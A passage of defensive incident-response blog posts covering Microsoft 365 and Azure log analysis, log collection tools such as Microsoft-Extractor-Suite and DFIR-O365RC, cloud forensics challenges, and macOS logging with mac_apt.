—a technique used by attackers to discover valid usernames by testing different variations. ------------------------------------------------------------------------------------------------------------- Investigating MFA-Related Events When multi-factor authentication (MFA) is enabled, additional events are logged during the authentication process. For example: UserStrongAuthClientAuthNRequired : Logged when a user s uccessfully enters their username and password but is then prompted to complete MFA . UserStrongAuthClientAuthNRequiredInterrupt : Logged if the user cancels the login attempt after being asked for the MFA token. These events are particularly useful in detecting attempts by attackers to bypass MFA. If you notice a sudden increase in UserStrongAuthClientAuthNRequiredInterrupt  events, it could indicate that attackers have obtained passwords from a compromised database and are testing accounts to find those without MFA enabled. ------------------------------------------------------------------------------------------------------------- Investigating Mailbox Access and Delegation Attackers who gain access to a Microsoft 365 environment often target email accounts, particularly those of key personnel. Once inside, they may attempt to read emails or set up forwarding rules to siphon off sensitive information . One tactic is to use delegate access , where one account is granted permission to access another user’s mailbox. Delegate access is logged in UAL, and reviewing these logs can reveal when permissions are assigned or when a delegated mailbox is accessed . In addition, organizations should regularly audit their user lists to check for unauthorized accounts that may have been created by attackers. In many cases, such unauthorized users are only discovered during license reviews. Another avenue for attackers is server-side forwarding , which can be set up through either a Transport Rule  or an Inbox Rule . These forwarding mechanisms can be used to exfiltrate data, so security teams should regularly review the organization’s forwarding rules to ensure no unauthorized forwarding is taking place. ------------------------------------------------------------------------------------------------------------- External Applications and Consent Monitoring Microsoft 365 users can grant third-party applications access to their accounts, which poses a potential security risk. Once access is granted, the application doesn’t need further permission to interact with the account. Monitoring for the Consent to application  event can help organizations detect when external applications are being granted access , particularly if the organization doesn’t typically use external apps. This was a factor in the well-documented SANS breach  in 2020, where attackers exploited third-party app permissions to gain access to a user’s mailbox. https://www.sans.org/blog/sans-data-incident-2020-indicators-of-compromise/ ------------------------------------------------------------------------------------------------------------- Conclusion While Microsoft 365 offers powerful built-in tools for detecting risky behavior and investigating suspicious logon events, security teams must be aware of their limitations, particularly the potential for false positives and delayed alerts. By regularly reviewing log data, investigating unusual patterns, and keeping an eye on key events like failed login attempts, MFA interruptions, and delegation changes, organizations can better protect their environments against evolving threats. The key to effective security monitoring is a proactive approach, combining automated detection with human analysis to sift through the noise and focus on genuine risks. Akash Patel

  • Streamlining Cloud Log Analysis with Free Tools: Microsoft-Extractor-Suite and Microsoft-Analyzer-Suite

    When it comes to investigating cloud environments, having the right tools can save a lot of time and effort. Today, I’ll introduce two free, powerful tools that are absolutely fantastic for log analysis within the Microsoft cloud ecosystem: Microsoft-Extractor-Suite  and Microsoft-Analyzer-Suite . These tools are easy to use, flexible, and can produce output in accessible formats like CSV and Excel, making them excellent resources for investigating business email compromises, cloud environment audits, and more. About Microsoft-Extractor-Suite The Microsoft-Extractor-Suite  is an actively maintained PowerShell tool designed to streamline data collection from Microsoft environments, including Microsoft 365 and Azur e. This toolkit provides a convenient way to gather logs and other key information for forensic analysis and cybersecurity investigations. Supported Microsoft Data Sources Microsoft-Extractor-Suite can pull data from numerous sources, including: Unified Audit Log Admin Audit Log Mailbox Audit Log Azure AD Sign-In Logs Azure Activity Logs Conditional Access Policies MFA Status for Users Registered OAuth Applications This range allows investigators to get a comprehensive picture of what’s happening across an organization’s cloud resources. ---------------------------------------------------------------------------------------------------------- Installation and Setup To get started, you’ll need to install the tool and its dependencies. Here’s a step-by-step guide: Install Microsoft-Extractor-Suite : Install-Module -Name Microsoft-Extractor-Suite Install the PowerShell module Microsoft.Graph  (for Graph API Beta functionalities): Install-Module -Name Microsoft.Graph Install ExchangeOnlineManagement  (for Microsoft 365 functionalities): Install-Module -Name ExchangeOnlineManagement Install the Az module  (for Azure Activity log functionality): Install-Module -Name Az Install the AzureADPreview module  (for Azure Active Directory functionalities): Install-Module -Name AzureADPreview Once the modules are installed, you can import them using: Import-Module .\Microsoft-Extractor-Suite.psd1 ---------------------------------------------------------------------------------------------------------- Note:  You will need to sign in to Microsoft 365 or Azure with appropriate permissions(Admin level access, included P1 or higher access level, or an E3/E5 license) before using Microsoft-Extractor-Suite functions. ---------------------------------------------------------------------------------------------------------- Getting Started First, connect to your Microsoft 365 and Azure environments: Connect-M365 Connect-Azure Connect-AzureAZ From here, you can specify start and end dates, user details, and other parameters to narrow down which logs to collect. The tool captures output in Excel format by default, stored in a designated output folder. Link :- https://microsoft-365-extractor-suite.readthedocs.io/en/latest/ ---------------------------------------------------------------------------------------------------------- Example Log I collected: One drawback to keep in mind is that logs are collected one by one. example first u collect MFA logs second again you written command and collected Users log. Another thing to keep in mind is if u do not provide path output will be capture under default folder where script is present. ---------------------------------------------------------------------------------------------------------- You might have question why two different suite? Answer is because there is script name Microsoft-Analyzer-Suite developed by evild3ad. This suite offers a collection of PowerShell scripts specifically designed for analyzing Microsoft 365 and Microsoft Entra ID data, which can be extracted using the Microsoft-Extractor-Suite. Current Analysis support by Microsoft-Analyzer-Suite is: Link: https://github.com/evild3ad/Microsoft-Analyzer-Suite ---------------------------------------------------------------------------------------------------------- Before I start, I will show you folder structure of both the tools: Microsoft-Extractor-Suite Microsoft-Analyzer-Suite-main Analyzer-Suit allows You can also add specific IP addresses, ASNs, or applications to a whitelist by editing the whitelist folder in the Microsoft-Analyzer-Suite directory. ------------------------------------------------------------------------------------------------------------ Lets start: I will show you two logs capture and analyzed is message trace log other one Unified audit log all collect using the script Microsoft extractor suite and than I will use Microsoft-Analyzer-Suite. Collecting Logs with Microsoft-Extractor-Suite Now, let’s go over collecting logs. Here’s an example command to retrieve the Unified Audit Log  entries for the past 90 days for all users: Get-UALAll After running this, the tool will output data in Excel format to a default folder. However, you may need to combine multiple excel file into one .csv file. Because Anlyzer suite script only run using .csv. ------------------------------------------------------------------------------------------------------------ Combining CSV Files into One Excel File When working with large data sets, it's more efficient to combine multiple log files into a single file. Here’s how to do this in Excel: Place all relevant CSV files in a single folder. Open a new Excel spreadsheet and navigate to Data > Get Data > From File > From Folder . Select the folder containing your CSV files and click “Open”. From the Combine  drop-down, choose Combine & Transform Data . This option loads your files into the Power Query Editor , where you can manipulate and arrange the data. In the Power Query Editor, click OK  to load your combined data. Edit any column formats, apply filters, or sort the data as needed. Once done, go to Home > Close & Load   Once Done Output will be look like below: But to ensure compatibility with Microsoft-Analyzer-Suite save the file as a .csv Using Microsoft-Analyzer-Suite for Log Analysis With your data collected and organized, it’s time to analyze it with Microsoft-Analyzer-Suite . UAL-Analyzer.ps1 Before using UAL-Analyzer.ps1 script there are few dependencies u have to make sure these are installed for running script First is creating is IPinfo account its free. https://ipinfo.io/signup?ref=cli ImportExcel  for Excel file handling (PowerShell Module) Install-Module -Name ImportExcel https://github.com/dfinke/ImportExcel IPinfo CLI (Standalone Binary) https://github.com/ipinfo/cli xsv (Standalone Binary) https://github.com/BurntSushi/xsv To install xsv: Now as I had WSL (I used command git clone https://github.com/BurntSushi/xsv.git ) You can download folder (as you feel comfortable) Once dependencies are set up, configure your IPinfo  token by pasting it into the UAL-Analyzer  script. To locate this in the script: Open UAL-Analyzer.ps1  with a text editor like Notepad++, search for the token variable, and paste your token there. Running the Analysis Script For Unified Audit Logs, use the UAL-Analyzer  script. For example: .\UAL-Analyzer.ps1 "C:\Path\To\Your\CombinedUALLog.csv" -output "C:\Path\To\Output\" Once script ran successfully and output collected you will get pop up ------------------------------------------------------------------------------------------------------------ Lets check the output: As per screenshot , You can see output will be in CSV, XLSX in both format. Now question arise why there is same output in different. This is because the XLSX will contain output in coloured format, if something suspicious found it will be highlighted automatically. Where as csv will be in no highlighted format. Example of xlsx: Example of CSV: Folder Suspicious Operation: Kind note scripts are still getting updated and modified if you open GitHub you might find newer version it might work better for current this will output for me it make thing easy hope it do for you as well. ------------------------------------------------------------------------------------------------------------ Second Log we are going to talk about Message Trace logs Command : (This will collect all logs) Get-MessageTraceLog Screenshot of Output: Next step is Combined all excel into one(.csv format). Once done run MTL-Analyzer script .\MTL-Analyzer.ps1 "C:\Path\To\Your\CombinedMTLLog.csv" -output "C:\Path\To\Output\" (Make sure before running add token details inside the script than run the script) Conclusion By combining Microsoft-Extractor-Suite  and Microsoft-Analyzer-Suite , you can effectively streamline log collection and analysis across Microsoft 365 and Azure environments. While each suite has its own focus, together they provide an invaluable resource for incident response and cybersecurity. Now that you have the steps, you can test and run the process on your own logs. I hope this guide makes things easier for you! See you, and take care! Akash Patel

  • Streamlining Office/Microsoft 365 Log Acquisition: Tools, Scripts, and Best Practices

    When conducting investigations, having access to Unified Audit Logs (UALs)  from Microsoft 365 (M365) environments is crucial. These logs help investigators trace activities within an organization, covering everything from user login attempts to changes made in Azure Active Directory (AD)  and Exchange Online . There are two primary ways for investigators to search and filter through UALs : Via the Microsoft 365 web interfac e  for basic investigation. Using r eady-made script framework s  to automate data acquisition and conduct more in-depth, offline analysis. While the M365 interface is helpful for small-scale operations, using PowerShell scripts  or specialized tools can save a lot of time in larger investigations . This article will walk you through the process of acquiring Office 365 logs, setting up acquisition accounts, and leveraging open-source tools to make investigations more efficient. --------------------------------------------------------------------------------------------------------- Setting Up a User Account for Log Acquisition To extract logs for analysis , you need to set up a special user account in M365 with specific permissions that provide access to both Azure AD  and Exchange-related information . This process requires setting up roles in both the Microsoft 365 Admin Center  and the Exchange Admin Center . Step 1: Create an Acquisition Account in M365 Admin Center Go to the M365 Admin Center . Create a new user account . Assign the Global Reader  role to the account. This role grants access to Unified Audit Logs (UALs). Step 2: Set Up Exchange Permissions Next, you’ll need to set up permissions in the Exchange Admin Center : Go to the Exchange Admin Center  and create a new group . Assign the Audit Log  permission to the group. This role allows access to audit logs for Exchange activities. Add the user you created in the M365 Admin Center  to this group. Now that the account has the necessary permissions, you are ready to acquire logs from Microsoft 365 for your investigation. Note: If in future it became possible i will create an detailed blog to how to setup account and collect logs manually. --------------------------------------------------------------------------------------------------------- Automation: Using Ready-Made Acquisition Scripts Several pre-built scripts make the process of acquiring Unified Audit Logs (UALs)  and other cloud-based logs easier, especially when conducting large-scale investigations. Below are two of the most widely used frameworks: 1. DFIR-O365RC  (Developed by ANSSI) DFIR-O365RC  is a powerful PowerShell-based tool developed by ANSSI , the French governmental Cyber Security Agency. This tool is designed to extract UAL data and integrate with Azure APIs  to provide a more comprehensive view of the data. Key Features : Access to both UAL and multiple Azure APIs, allowing for more enriched data acquisition. The tool is somewhat complex, but the GitHub  page provides guidance on setup and usage. Usage : Once you set up the Global Reader  account and Audit Log  permissions , you can use DFIR-O365RC  to automate the extraction of logs. The tool provides a holistic view of available data, including enriched details from Azure AD and Exchange. Reference : DFIR-O365RC GitHub Page 2. Office-365-Extractor  (Developed by PwC Incident Response Team) Another useful tool is Office-365-Extractor , developed by PwC’s incident response team . This tool includes functional filters  that let investigators fine-tune their extraction depending on the type of investigation they are running. Key Features : Functional filters for tailoring data extraction to specific investigation needs. Complements PwC’s Business Email Compromise (BEC)  investigation guide, which offers detailed instructions on analyzing email compromises in Office 365 environments. Usage :Investigators can quickly set up the tool and begin filtering logs by specific criteria like user activity, mailbox access, or login attempts. Reference : Office-365-Extractor GitHub Page Business Email Compromise Guide Both DFIR-O365RC  and Office-365-Extractor  provide a more streamlined approach for handling larger volumes of data, making it easier to manage in-depth investigations without running into the limitations of the Microsoft UI. --------------------------------------------------------------------------------------------------------- Tool I prefer Microsoft Extractor Suite: Another Cloud-Based Log Acquisition Tool In addition to the tools mentioned above, there is another robust tool known as the Microsoft Extractor Suite . It is considered one of the best options for cloud-based log analysis  and acquisition. Though we won’t dive into full details in this article, it’s worth noting that this tool is highly recommended for investigators dealing with larger or more complex environments. --------------------------------------------------------------------------------------------------------- Why Automated Tools Are Crucial for Large-Scale Investigations While the M365 UI  is convenient for smaller investigations, its limitations become apparent during large-scale data acquisitions. Automated scripts  not only save time but also allow for more thorough and efficient data collection . These tools can help investigators get around the API export limitations , ensuring that no critical data is missed. Additionally, data science methodologies  can be applied to the collected logs to uncover patterns, trends, or anomalies that might otherwise go unnoticed in manual analysis . As cloud-based environments continue to grow in complexity, leveraging these automation frameworks becomes increasingly essential for effective incident response. --------------------------------------------------------------------------------------------------------- Final Thoughts and Next Steps In conclusion, the combination of Microsoft 365 Admin Center , Exchange Admin Center , and automated tools like DFIR-O365RC  and Office-365-Extractor  provides investigators with a powerful framework for extracting and analyzing Office 365 logs. Setting up the right user accounts with appropriate roles is the first step, followed by leveraging these scripts to automate the process, ensuring no data is overlooked. Stay tuned for a detailed guide on the Microsoft Extractor Suite, which we’ll cover in an upcoming blog post. Until then, happy investigating! Akash Patel

  • M365 Logging: A Guide for Incident Responders

    When it comes to Software as a Service (SaaS), defenders heavily rely on the logs and information provided by the vendor . For Microsoft 365 (M365), the logging capabilities are robust, often exceeding what incident responders typically find in on-premises environments. At the heart of M365’s logging system is the Unified Audit Log (UAL) , which captures over 100 different activities across most of the SaaS products. What You Get: Logs and Retention Periods The type of logs you have access to, and their retention periods, depend on your M365 licensing. While there are options to extend retention by offloading data periodically, obtaining the detailed logs available with higher-tier licenses can be challenging with less expensive options. Another consideration is the limitations Microsoft places on API quotas for offloading and offline analysis. However, there are ways to navigate these restrictions effectively. Log Retention Table: (It kept on updating by Microsoft so keep an eye on Microsoft) Key Logs in M365 Azure AD Sign-in Logs : Most Microsoft services now use Azure Active Directory (AD) for authentication. In this context, the Azure AD Sign-in logs can be compared to the 4624  and 4625  event logs in on-premises domain controllers. A unique aspect of these logs is that most authentication requests originate from the internet through publicly exposed services. This allows for additional detection methods based on geolocation data. The information gathered here is also ideal for time-based pattern analysis, enabling defenders to track unusual login behaviors. Unified Audit Log (UAL) : T he UAL is a treasure trove of activity data available to all paid enterprise licenses . The level of detail varies by licensing tier, and Microsoft occasionally updates what each package includes. Unlike typical Windows logs, where a significant percentage may be irrelevant to incident response, the UAL is designed for investigations, with almost all logged events being useful for tracing activities. Investigation Categories To help incident responders leverage the UAL effectively, we categorize investigations into three types: User-based , Group-based , and Application-based  investigations. Each category will include common scenarios and relevant search terms. 1. User-Based Investigations These investigations focus on user objects within Azure AD. Key activities include: Tracking User Changes : Understand what updates have been made to user profiles, including privilege changes and password resets. Auditing Admin Actions : Log any administrative actions taken in the directory, which is crucial for accountability. Typical Questions : What types of updates have been applied to users? How many users were changed recently? How many passwords have been reset? What actions have administrators performed in the directory? 2. Group-Based Investigations Group-based investigations are closely related to user investigations since permissions in Azure AD often hinge on group memberships. Monitoring groups is vital for security. Group Monitoring : Track newly added groups and any changes in memberships, especially for high-privilege groups. Typical Questions : What new groups have been created? Are there any groups with recent membership changes? Have the owners of critical groups been altered? 3. Application-Based Investigations Application logs can vary significantly depending on the services in use. One critical area to investigate is application consent , which can highlight potential breaches if an attacker gains access through an Azure application. Typical Questions : What applications have been added or updated recently? Which applications have been removed? Has there been any change to a service principal for an application? Who has given consent to a particular application? 4. Azure AD Provision Logs Azure AD Provision logs are generated when integrating third-party services like ServiceNow or Workday with Azure AD. These services often facilitate employee-related workflows that need to connect with the user database. Workflow Monitoring : For instance, during employee onboarding in Workday, the integration may involve creating user accounts and assigning them to appropriate groups, all of which are logged in Azure AD Provision logs. Typical Questions : What groups have been created in ServiceNow? Which users were successfully removed from Adobe? What users from Workday were added to Active Directory? Leveraging Microsoft Defender for Cloud Apps The Microsoft Defender for Cloud Apps  can be an invaluable tool during investigations, provided it is correctly integrated with your cloud applications. By accessing usage data, defenders can filter out certain user agents and narrow down the actions of an attacker. For more information, refer to Microsoft Defender for Cloud Apps Announcement . Conclusion Understanding and effectively utilizing the logging capabilities of M365, particularly the Unified Audit Log and other related logs, can significantly enhance your incident response efforts. By focusing on user, group, and application activities, defenders can gain valuable insights into potential security incidents and make informed decisions to bolster their security posture. Akash Patel

  • Microsoft Cloud Services: Focus on Microsoft 365 and Azure

    Cloud Providers in Focus: Microsoft and Amazon In today’s cloud market, Microsoft and Amazon are the two biggest players, with each offering a variety of services. Microsoft provides solutions across all three categories—Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS) . Amazon, on the other hand, focuses heavily on IaaS and PaaS, with limited SaaS offerings . For investigative purposes, the focus with Amazon is usually on IaaS and PaaS components, while Microsoft’s extensive suite of cloud services demands a closer look into Microsoft 365 (M365) and Azure. Microsoft 365 (M365): A Successor to Office 365 Microsoft 365, previously known as Office 365, is a comprehensive cloud-based suite that offers both SaaS and on-premises tools to businesses. Licensing within Microsoft 365 can get quite complicated, especially when viewed from a security and forensics perspective. The impact of licensing on forensic investigations is significant, as it determines the extent of data and log access. Understanding M365 Licensing M365 licenses range from Business Basic  to Business Premium , with Enterprise tiers referred to as E1, E3, and E5 : Business Basic : Provides cloud access to Exchange, Teams, SharePoint, and OneDrive. Business Standard : Adds access to downloadable Office apps (Word, Excel, etc.) and web-based versions. Business Premium : Adds advanced features like Intune for device management and Microsoft Defender. Enterprise licenses offer more advanced security features, with E3 and E5  providing the highest level of access to security logs and forensic data. In forensic investigations, having access to these higher-tier licenses is essential for capturing a comprehensive view of the environment. Impact on Forensics In an M365 environment, licensing plays a crucial role in how effectively investigators can respond to breaches. In traditional on-premises setups, investigators had access to physical machines for analysis, regardless of license level. However, in cloud settings, access to vital data is often gated by licensing, making high-tier licenses, such as E3 and E5 , invaluable for thorough investigations. Azure: Microsoft’s IaaS with a Hybrid Twist Azure, Microsoft’s IaaS solution, includes PaaS and SaaS components like Azure App Services and Azure Active Directory (Azure AD). It provides customers with virtualized data centers, complete with networking, backup, and security capabilities . The IaaS aspect allows customers to control virtual machines directly, enabling traditional forensic processes such as imaging, memory analysis, and the installation of specialized forensic tools. Azure Active Directory (Azure AD) and Hybrid Setups Azure AD, a critical component for many organizations, provides identity and access management across Microsoft’s cloud services . In hybrid environments, Azure AD integrates with on-premises Active Directory (AD) to support cloud-based services like Exchange Online, ensuring seamless authentication across on-prem and cloud environments. This integration introduces Azure AD Connect , which synchronizes data between on-prem AD and Azure AD. As a result, administrators can manage both environments from Azure, but this also increases exposure to the internet. Unauthorized access to Azure AD credentials could compromise the entire environment, which highlights the need for Multi-Factor Authentication (MFA) . Key Considerations for Azure AD Connect Azure AD Connect is integral for organizations using both on-prem and cloud-based Active Directory. It relies on three key accounts, each with specific permissions to enhance security and maintain synchronization: AD DS Connector Account : Reads and writes data to and from the on-premises AD. ADSync Service Account : Syncs this data into a SQL database, serving as an intermediary. Azure AD Connector Account : Syncs the SQL database with Azure AD, allowing Azure AD to reflect updates from on-prem AD. These roles are critical for secure synchronization, ensuring that changes in on-premises AD are accurately mirrored in Azure AD. This dual setup requires investigators to examine both infrastructures during an investigation, increasing the complexity of the forensic process. The Role of MFA and Security Risks in Hybrid Environments In hybrid setups, users are accustomed to entering domain credentials on cloud-based platforms, making them vulnerable to phishing attacks. MFA plays a vital role in preventing unauthorized access but is not foolproof. Skilled attackers can bypass MFA through various techniques, such as phishing  or SIM swapping , underlining the need for a layered security approach. Microsoft’s Licensing Complexity and Forensics Microsoft’s licensing structure is notorious for its complexity, and this extends to M365. While on-premises systems allowed investigators full access to data regardless of licensing, the cloud imposes limits based on the chosen license tier. This means that E3 and E5 licenses  are often necessary for investigators to access the full scope of data logs and security features needed for in-depth analysis. In hybrid environments, these licensing considerations directly impact the data available for forensics. For example, lower-tier licenses may provide limited audit logs, while E5 licenses include advanced logging and alerting features that can make a significant difference in detecting and responding to breaches. Investigative Insights and Final Thoughts For investigators, Microsoft’s cloud services introduce new layers of complexity: Dual Authentication Infrastructures : Hybrid setups mean you’ll need to investigate both on-prem and cloud-based AD systems. MFA Requirements : Securing Azure AD with MFA is crucial, but investigators must be aware of MFA’s limitations and potential bypass methods. High-Tier Licenses for Forensic Access : E3 and E5 licenses unlock advanced security and audit logs that are vital for thorough investigations. In summary, Microsoft 365 and Azure provide powerful tools for businesses but introduce additional challenges for forensic investigators. By understanding the role of licensing, Azure AD synchronization, and MFA, organizations can better prepare for and respond to incidents in their cloud environments. These considerations ensure that forensic investigators have the access they need to effectively secure, investigate, and manage cloud-based infrastructure. Akash Patel

  • Forensic Challenges of Cloud-Based Investigations in Large Organizations

    Introduction: Cloud-Based Infrastructure and Its Forensic Challenges Large-scale investigations have a wide array of challenges. One that’s increasingly common is navigating the cloud-based infrastructure of large organizations. As more businesses integrate cloud services with on-premises systems like Microsoft Active Directory, attackers can easily move between cloud and on-premises environments—an investigator’s nightmare! Cloud platforms are tightly woven into corporate IT, yet they bring unique considerations for incident response and forensic investigations. A key point to remember is that cloud infrastructure essentially boils down to “someone else’s computer.” And unfortunately, that “someone else” may not be ready to grant you full forensic access when a breach occurs. To get into the nitty-gritty of cloud forensics, it’s essential to understand the different types of cloud offerings: Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS). Each of these comes with unique access levels and data availability, impacting how effectively we can conduct investigations. Diving Into Cloud Services: IaaS, PaaS, and SaaS Let’s break down these cloud service types to see how they affect access to forensic data. 1. Infrastructure as a Service (IaaS) What It Is : In IaaS, cloud providers offer virtual computing resources over the internet . You get to spin up virtual machines and networks, almost like your own data center, except it’s hosted by the provider. Forensic Access : Since customers manage their own operating systems and applications, IaaS provides the most forensic access among cloud service types. Investigators can perform standard incident response techniques, like log analysis and memory captures, much as they would on on-prem systems. Challenges : The major challenge is the dependency on the provider. Moving away from a provider you’ve invested in heavily can be a headache . So, it’s essential to plan security and forensic readiness from the start. 2. Platform as a Service (PaaS) What It Is : PaaS bundles the OS with essential software, such as application servers, allowing you to deploy applications without worrying about the underlying infrastructure . Forensic Access : This setup limits access to the underlying OS, which restricts what investigators can directly analyze. Y ou can access logs and some application data, but full system access is typically off-limits. Challenges : Because multiple customers often share the infrastructure, in-depth forensics might reveal data belonging to other clients. Therefore, cloud providers rarely allow forensic access to the physical machines in a PaaS setup. 3. Software as a Service (SaaS) What It Is : SaaS handles everything from the OS up, so the customer only interacts with the software. Forensic Access : Forensics in a SaaS environment is usually limited to logs, often determined by the service tier (and subscription cost). If a backend compromise occurs, SaaS logs might not give enough data to identify the root cause. Challenges : This limitation can cause breaches to go unnoticed for extended periods. SaaS providers control everything, so investigators can only work with whatever logs or data the provider makes available. Cloud-Based Forensics vs. Traditional On-Premises Forensics With traditional on-premises forensics , investigators have deep access to various system components. They can use techniques like creating super timelines to correlate events across systems, uncovering hidden evidence . Cloud forensics, however, is a different story. Cloud investigations resemble working with Security Information and Event Management (SIEM) systems in Security Operations Centers (SOCs). Just as SIEM setups depend on pre-selected data inputs, cloud providers offer only certain types of logs and data. This means you need to plan ahead to ensure you’re capturing the right logs. When it’s time to investigate, you’ll be limited to whatever was logged based on the initial setup and your subscription level. Essential Steps for Incident Response in the Cloud Handling incidents in the cloud follows many of the same steps as traditional response processes, but there’s an added emphasis on preparation. Without the right preparations, investigators could be left scrambling, unable to detect or respond to intrusions effectively. Preparation : Know Your Environment : Document the systems your organization uses, along with any defenses and potential weak spots. Prepare for likely incidents based on your cloud architecture and assets. Logging : Make sure you’re subscribed to an adequate logging tier to capture the necessary data for investigations. Higher-tier subscriptions often provide more granular logs, which are crucial for in-depth analysis. Data Retention : Cloud providers offer different retention periods depending on the subscription. Ensure the data you need is available long enough for proper analysis. Detection : Use tools like the MITRE ATT&CK® framework to identify techniques and indicators of compromise specific to cloud environments. Regularly review security logs to detect anomalous activities. Log aggregators and monitoring tools can streamline this process. Analysis : For IaaS, you can perform traditional forensic techniques, such as memory analysis and file recovery. For PaaS and SaaS, focus on analyzing available logs. If suspicious activity is detected, collect and analyze whatever data the provider can provide. Correlate cloud logs with on-premises logs to trace attacker movements between environments. Containment & Eradication : In the cloud, containment often involves disabling specific accounts or access keys, updating permissions, or isolating compromised systems. For SaaS or PaaS, the provider might handle containment on their end, so you’ll need a strong partnership with your provider to act quickly in a breach. Recovery : Implement any necessary changes to strengthen security and avoid re-compromise. This may involve changing access policies, adjusting logging settings, or reconfiguring cloud resources. Lessons Learned : Post-incident, review what happened and how it was handled. Look for opportunities to enhance your response capabilities and bolster your cloud security posture. Leveraging the MITRE ATT&CK Framework for Cloud Environments The MITRE ATT&CK framework, renowned for cataloging adversary tactics and techniques, has been expanded to include cloud-specific threats . While current versions focus on major cloud platforms like Microsoft Azure and Google Cloud, they also include techniques applicable to IaaS and SaaS broadly. This makes it a valuable resource for proactive defense planning in cloud environments. Regularly reviewing the techniques in the framework can help you design detections that fit your organization’s cloud architecture. By integrating the ATT&CK framework into your cloud incident response strategy, you’ll be better equipped to recognize suspicious behavior and quickly respond to emerging threats. Conclusion: Embracing Cloud Forensics in an Evolving Threat Landscape Cloud forensics presents a unique set of challenges, but with the right knowledge and tools, your organization can respond effectively to incidents in cloud environments. Remember, it’s all about preparation. Invest in adequate logging, establish incident response protocols, and familiarize your team with the MITRE ATT&CK framework. By doing so, you’ll ensure that you’re ready to tackle threats in the cloud with the same rigor and responsiveness as on-premises investigations. Akash Patel

  • macOS Incident Response: Tactics, Log Analysis, and Forensic Tools

    macOS logging is built on a foundation similar to traditional Linux/Unix  systems, thanks to its BSD ancestry . While macOS generates a significant number of logs, the structure and format of these logs have evolved over time ---------------------------------------------------------------------------------------------- Overview of macOS Logging Most macOS logs are stored in plain text   within the /var/log  directory (also found as /private/var/log ). These logs follow the traditional Unix Log Format : MMM DD HH:MM:SS HOST Service: Message One major challenge : log entries don't include the year  or time zone , so when reviewing events near the turn of the year, it’s important to be cautious. Logs are rotated based on size or age, with old logs typically compressed using gzip  or bzip2 . Key Difference from Linux/Unix Logging macOS uses two primary binary log formats: Apple System Log (ASL) : Introduced in macOS X Leopard , ASL stored syslog data in a binary format . While deprecated, it’s still important for backward compatibility. Apple Unified Log (AUL) : Starting with macOS Sierra (10.12) , AUL became the standard for most logging . Apps and processes now use AUL, but some data may still be logged via ASL. ---------------------------------------------------------------------------------------------- Common Log Locations Investigators should know where key log files are stored: /var/log : Primary system logs. /var/db/diagnostics : System diagnostic logs. /Library/logs : System and application logs. ~/Library/Logs : User-specific logs. /Library/Application Support/(App name) : Application logs. /Applications : Logs for applications installed on the system. ---------------------------------------------------------------------------------------------- Important Plain Text Logs Some of the most useful plain text logs for enterprise incident response include: /var/log/system.log : General system diagnostics. /var/log/DiskUtility.log : Disk mounting and management events. /var/log/fsck_apfs.log : Filesystem-related events. /var/log/wifi.log : Wi-Fi connections and known hotspots. /var/log/appfirewall.log : Network events related to the firewall. Note : Starting with macOS Mojave , many of these logs have transitioned to Apple Unified Logs  (AUL). On upgraded systems, you might still find them, but they are no longer actively used for logging in newer macOS versions. ---------------------------------------------------------------------------------------------- Binary Logs in macOS macOS has shifted toward binary logging formats for better performance and data integrity. Investigators should be familiar with two main types: 1. Apple System Logs (ASL) Location : /var/log/asl/*.asl View : Use the syslog  command or Console app  during live response. ASL  contains diagnostic and system management data , including startup/shutdown events and some process telemetry. 2. Apple Unified Logs (AUL) Location : /var/db/diagnostics/Persist /var/db/diagnostics/timesync /var/db/uuidtext/ File Type : .tracev3 AUL  is the default logging format since macOS Sierra (10.12) . These logs cover a wide range of activities, from user authentication  to sudo usage , and are critical for forensic analysis. How to View AUL: View in live response : Use the log  command or the Console app . File parsing : These logs are challenging to read manually. It’s best to use specialized tools designed to extract and analyze AUL logs. ---------------------------------------------------------------------------------------------- Limitations of macOS Logging Default Logging May Be Insufficient : Most macOS systems don’t have enhanced logging enabled (like auditd ), which provides more detailed logs. This can result in gaps when conducting enterprise-level incident response. Log Modification : U sers with root or sufficient privileges can modify or delete logs , meaning attackers may tamper with evidence. Binary Format Challenges : A nalyzing ASL  and AUL  logs on non-macOS systems can be difficult . The best approach is to use a macOS device for live response or log analysis , as using other platforms may result in a loss of data quality. ---------------------------------------------------------------------------------------------- Live Log Analysis in macOS 1. Using the Last Command Just like in Linux, the last  command shows the most recent logins on the system, giving investigators a quick overview of user access. 2. Reading ASL Logs with Syslog The syslog  command allows investigators to parse Apple System Log (ASL)  files in binary format: syslog -f (filename).asl While it can reveal key system events, it’s not always easy to parse visually. 3. Live Analysis with the Console App For a more user-friendly experience, macOS provides the Console app , a GUI tool  that allows centralized access to both Apple System Logs (ASL)  and the more modern Apple Unified Logs (AUL) . It’s an ideal tool for visual log analysis, but keep in mind, you can’t process Console output with command-line tools or scripts. ---------------------------------------------------------------------------------------------- Binary Log Analysis on Other Platforms When you can’t analyze logs on a macOS machine, especially during forensic analysis on Windows or Linux, mac_apt  is a powerful, cross-platform solution. mac_apt: macOS Artifact Parsing Tool Developed by Yogesh Khatri , mac_apt  is an open-source tool designed to parse macOS and iOS artifacts, including Apple Unified Logs (AUL) . https://github.com/ydkhatri/mac_apt Key Features : Reads from various sources like raw disk images, E01 files, VMDKs, mounted disks, or specific folders. Extracts artifacts such as user lists , login data , shell history , and Unified Logs . Outputs data in CSV , TSV , or SQLite  formats. Challenges with mac_apt : TSV Parsing : The default TSV output  is in UTF-16 Little Endian , which can be tricky to process with command-line tools. However, it works well in spreadsheet apps. Large File Sizes : Log files can be huge, and mac_apt generates additional copies for evidence, which can take up significant disk space . For example, analyzing a 40GB disk image could produce a 13GB UnifiedLogs.db  file and 15GB of exported evidence. Speed : Some plugins can be slow to run . Using the FAST  option avoids the slowest ones but can still take 10-15 minutes to complete. A f ull extraction with plugins like SPOTLIGHT  and UNIFIEDLOGS  can take over an hour. ---------------------------------------------------------------------------------------------- How to Use mac_apt The command-line structure of mac_apt  is straightforward, and you can select specific plugins based on the data you need: python /opt/mac_apt/mac_apt.py -o /output_folder --csv -d E01 /diskimage.E01 PLUGIN_NAME For example, to investigate user activity: python /opt/mac_apt/mac_apt.py -o /analysis --csv -d E01 /diskimage.E01 UTMPX USERS TERMSESSIONS This will extract user information, login data, and shell history files into TSV files. Useful mac_apt Plugins for DFIR : ALL : Runs every plugin (slow, only use if necessary). FAST : Runs plugins without UNIFIEDLOGS , SPOTLIGHT , and IDEVICEBACKUPS , speeding up the process. SUDOLASTRUN : Extracts the last time sudo was run, useful for privilege escalation detection. TERMSESSIONS : Reads terminal history 